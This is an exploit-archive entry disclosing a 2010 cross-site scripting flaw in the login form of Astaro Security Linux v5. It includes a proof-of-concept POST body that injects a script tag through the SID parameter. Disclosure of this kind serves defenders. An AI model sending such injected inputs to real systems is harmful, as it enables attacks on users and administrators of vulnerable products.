Astaro Security Linux v5 (XSS) Cross Site Scripting Vulnerability

2010-03-24T00:00:00
ID 1337DAY-ID-11428
Type zdt
Reporter Vincent Hautot
Modified 2010-03-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =================================================================
Astaro Security Linux v5 (XSS) Cross Site Scripting Vulnerability
=================================================================


Program          : Astaro Security Linux v5
PoC              : XSS
Homepage         : http://www.astaro.com/
Found by         : Vincent Hautot
Contact          : v.hautot () sysdream com

//----- Application description

Astaro Security Linux is a complete network security solution that
protects organizations against a wide range of threats to security
and productivity.


//----- Description of vulnerability

This Xss was found on index.fpl page in the login form. Usig this flaw
it is possible to execute Javascript code.
Posting using multipart/form-data does not work ; use this data instead:

[email protected]&password=DTC&SID=>"><script>alert("XSS !!!")</script>
&cur_width=1&window_height=700&id=0121&jaction=none&frameset=active&new_id=0




#  0day.today [2018-01-08]  #